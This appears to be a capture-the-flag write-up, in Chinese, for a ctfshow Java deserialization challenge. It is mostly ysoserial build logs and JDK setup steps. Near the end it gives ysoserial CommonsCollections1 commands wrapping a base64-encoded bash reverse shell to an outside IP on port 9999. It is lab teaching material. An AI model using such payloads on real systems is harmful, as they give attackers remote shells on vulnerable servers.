1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37

"C:\Program Files\Java\jdk1.8.0_201\bin\java.exe" -Dmaven.multiModuleProjectDirectory=C:\Users\baozhongqi\Desktop\ysoserial-master\ysoserial-master -Djansi.passthrough=true "-Dmaven.home=D:\IntelliJ IDEA 2024.2.0.1\plugins\maven\lib\maven3" "-Dclassworlds.conf=D:\IntelliJ IDEA 2024.2.0.1\plugins\maven\lib\maven3\bin\m2.conf" "-Dmaven.ext.class.path=D:\IntelliJ IDEA 2024.2.0.1\plugins\maven\lib\maven-event-listener.jar" "-javaagent:D:\IntelliJ IDEA 2024.2.0.1\lib\idea_rt.jar=63881:D:\IntelliJ IDEA 2024.2.0.1\bin" -Dfile.encoding=UTF-8 -classpath "D:\IntelliJ IDEA 2024.2.0.1\plugins\maven\lib\maven3\boot\plexus-classworlds-2.8.0.jar;D:\IntelliJ IDEA 2024.2.0.1\plugins\maven\lib\maven3\boot\plexus-classworlds.license" org.codehaus.classworlds.Launcher -Didea.version=2024.2.0.1 clean
[INFO] Scanning for projects...
[INFO] 
[INFO] ------------------------< ysoserial:ysoserial >-------------------------
[INFO] Building ysoserial 0.0.6-SNAPSHOT
[INFO]   from pom.xml
[INFO] --------------------------------[ jar ]---------------------------------
Downloading from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-clean-plugin/3.2.0/maven-clean-plugin-3.2.0.pom
Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-clean-plugin/3.2.0/maven-clean-plugin-3.2.0.pom (5.3 kB at 2.8 kB/s)
Downloading from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-plugins/35/maven-plugins-35.pom
Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-plugins/35/maven-plugins-35.pom (9.9 kB at 7.3 kB/s)
Downloading from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/35/maven-parent-35.pom
Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/35/maven-parent-35.pom (45 kB at 15 kB/s)
Downloading from central: https://repo.maven.apache.org/maven2/org/apache/apache/25/apache-25.pom
Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/apache/25/apache-25.pom (21 kB at 13 kB/s)
Downloading from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-clean-plugin/3.2.0/maven-clean-plugin-3.2.0.jar
Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/plugins/maven-clean-plugin/3.2.0/maven-clean-plugin-3.2.0.jar (36 kB at 19 kB/s)
[INFO] 
[INFO] --- clean:3.2.0:clean (default-clean) @ ysoserial ---
Downloading from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-utils/3.3.4/maven-shared-utils-3.3.4.pom
Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-utils/3.3.4/maven-shared-utils-3.3.4.pom (5.8 kB at 9.3 kB/s)
Downloading from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-components/34/maven-shared-components-34.pom
Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-components/34/maven-shared-components-34.pom (5.1 kB at 3.4 kB/s)
Downloading from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/34/maven-parent-34.pom
Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/maven-parent/34/maven-parent-34.pom (43 kB at 13 kB/s)
Downloading from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-utils/3.3.4/maven-shared-utils-3.3.4.jar
Downloaded from central: https://repo.maven.apache.org/maven2/org/apache/maven/shared/maven-shared-utils/3.3.4/maven-shared-utils-3.3.4.jar (153 kB at 22 kB/s)
Downloading from central: https://repo.maven.apache.org/maven2/commons-io/commons-io/2.6/commons-io-2.6.jar
Downloaded from central: https://repo.maven.apache.org/maven2/commons-io/commons-io/2.6/commons-io-2.6.jar (215 kB at 22 kB/s)
[INFO] ------------------------------------------------------------------------
[INFO] BUILD SUCCESS
[INFO] ------------------------------------------------------------------------
[INFO] Total time:  33.033 s
[INFO] Finished at: 2024-08-19T21:12:09+08:00
[INFO] ------------------------------------------------------------------------

进程已结束，退出代码为 0

1
2
3
4
5
6
7

[INFO] Installing C:\Users\baozhongqi\Desktop\ysoserial-master\ysoserial-master\target\ysoserial-0.0.6-SNAPSHOT-all.jar to C:\Users\baozhongqi\.m2\repository\ysoserial\ysoserial\0.0.6-SNAPSHOT\ysoserial-0.0.6-SNAPSHOT.jar
[INFO] ------------------------------------------------------------------------
[INFO] BUILD SUCCESS
[INFO] ------------------------------------------------------------------------
[INFO] Total time:  01:10 min
[INFO] Finished at: 2024-08-19T21:57:10+08:00
[INFO] ------------------------------------------------------------------------

1

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar

1
2
3

ctfshow会对你post提交的ctfshow参数进行base64解码
然后进行反序列化
构造出对当前题目地址的dns查询即可获得flag

1
2
3
4

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections1 "bash -c {echo,base64命令}|{base64,-d}|{bash,-i}"|base64 
这里是反弹shell直接

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections1 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8yNy4yNS4xNTEuNDgvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}"|base64 

1
2
3
4
5

tar -xzvf jdk-8u421-linux-x64.tar.gz

mv jdk1.8.0_421 /opt

cd /opt/jdk1.8.0_421

1
2
3
4
5
6
7
8
9

vim /etc/profile

export JAVA_HOME=/opt/jdk1.8.0_421

( export JAVA_HOME=/opt/jdk版本)

export CLASSPATH=.:${JAVA_HOME}/lib

export PATH=${JAVA_HOME}/bin:$PATH

1

source /etc/profile

1
2
3
4
5
6
7

update-alternatives --install /usr/bin/java java /opt/jdk1.8.0_421/bin/java 1

update-alternatives --install /usr/bin/javac javac /opt/jdk1.8.0_421/bin/javac 1

update-alternatives --set java /opt/jdk1.8.0_421/bin/java

update-alternatives --set javac /opt/jdk1.8.0_421/bin/javac

1
2
3

java -version

javac -version

1

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections1 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8yNy4yNS4xNTEuNDgvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}"|base64